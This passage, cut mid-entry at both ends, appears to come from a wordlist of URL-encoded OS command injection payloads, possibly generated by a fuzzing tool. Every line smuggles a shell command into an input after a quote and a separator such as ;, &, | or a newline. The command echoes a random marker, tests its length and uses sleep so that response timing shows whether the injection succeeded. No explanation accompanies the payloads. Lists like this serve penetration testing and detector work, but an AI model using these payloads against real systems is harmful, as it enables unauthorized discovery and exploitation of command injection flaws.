0CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20CLRJXD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%0A%20str%3D%24%28echo%20WMHOZP%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20RQLLBC%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%22%7C%20%5B%201%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%202%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%203%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%204%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%205%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%206%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%207%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%208%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%7C%20%5B%209%20-ne%20%24%28echo%20AYUZTB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BKAIFJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%0A%20str%3D%24%28echo%20VDEVWJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%22%7C%20%5B%201%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%202%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%203%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%204%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%205%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%206%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%207%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%208%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%7C%20%5B%209%20-ne%20%24%28echo%20CINWSA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EWGAEA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%0A%20str%3D%24%28echo%20RSPYHG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%3B%20str%3D%24%28echo%20WTCBUU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%22%7C%20%5B%201%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%202%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%203%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%204%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%205%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%206%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%207%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%208%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%7C%20%5B%209%20-ne%20%24%28echo%20ADQAHN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%26%20sleep%200%20%26%26%20str%3D%24%28echo%20KGYKQW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%22%0A%20str%3D%24%28echo%20WXKPIW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\